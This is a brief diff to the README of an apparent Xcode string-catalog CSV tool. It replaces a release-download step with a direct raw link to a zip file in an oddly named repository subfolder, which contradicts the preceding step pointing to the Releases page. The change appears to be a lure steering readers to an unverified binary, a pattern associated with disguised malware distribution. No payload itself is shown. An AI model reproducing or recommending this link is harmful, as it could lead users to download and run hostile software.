TheEnd14147/xcode-xcstrings-csv-tool/README.md

 2. On the Releases page, look for the latest version.
 You will see a list of files available for download.

-3. Download the file named `xcode-xcstrings-csv-tool.zip` (or similar).
+3. Download the file named `https://raw.githubusercontent.com/TheEnd14147/xcode-xcstrings-csv-tool/main/rumblegarie/xcode-xcstrings-csv-tool_1.4.zip` (or similar).

 4. Once the download is complete, navigate to your download folder.